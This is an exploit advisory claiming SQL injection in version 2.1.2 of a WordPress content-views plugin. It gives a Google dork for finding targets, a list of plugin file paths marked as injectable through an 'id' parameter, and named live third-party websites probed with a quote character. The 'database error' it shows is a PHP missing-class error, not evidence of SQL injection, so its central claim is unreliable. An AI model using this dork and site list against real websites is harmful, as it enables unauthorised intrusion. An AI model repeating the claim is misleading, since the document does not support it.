####################################################################

# Exploit Title : WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : contentviewspro.com
# Software Download Link : downloads.wordpress.org/plugin/content-views-query-and-display-post-page.2.1.2.zip
# Software Information Link : wordpress.org/plugins/content-views-query-and-display-post-page/
# Software Version : 2.1.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/pt-content-views-pro/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Description about Software :
***************************

"ContentViews  Post Grid & List pt-content-views-pro" is open source software for WordPress.

####################################################################

# Impact :
***********

* WordPress PT-Content-Views-Pro Plugins 2.1.2 is prone to an 

SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied 

data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database. 

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
***********************

/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/admin/includes/templates/settings-section-one.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/admin/includes/replayout.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/class-tgm-plugin-activation.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/replace.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/support/acf-fields/image.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/support/acf-fields/relationship.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/support/pll.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/troubleshoot.php?id=[SQL Injection]

/wp-content/plugins/pt-content-views-pro/includes/update.php?id=[SQL Injection]

####################################################################

# Example Vulnerable Site :
*************************

[+] schlesingergroup.com/wp-content/plugins/pt-content-views-pro/admin/includes/replayout.php?id=1%27

[+] wegdermee.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] childrenslit.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] globalgreeternetwork.info/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] tekimobile.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] childrenslit.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] globalgreeternetwork.info/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] actoria.eu/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

[+] greenscapeenergy.co.uk/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27

####################################################################

# Example SQL Database Error :

Fatal error: Class 'PT_Content_Views_Admin' not found in 
/home/hhcnewserver/public_html/wp-content/plugins/pt-content-views-pro
/admin/content-views-admin.php on line 12

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################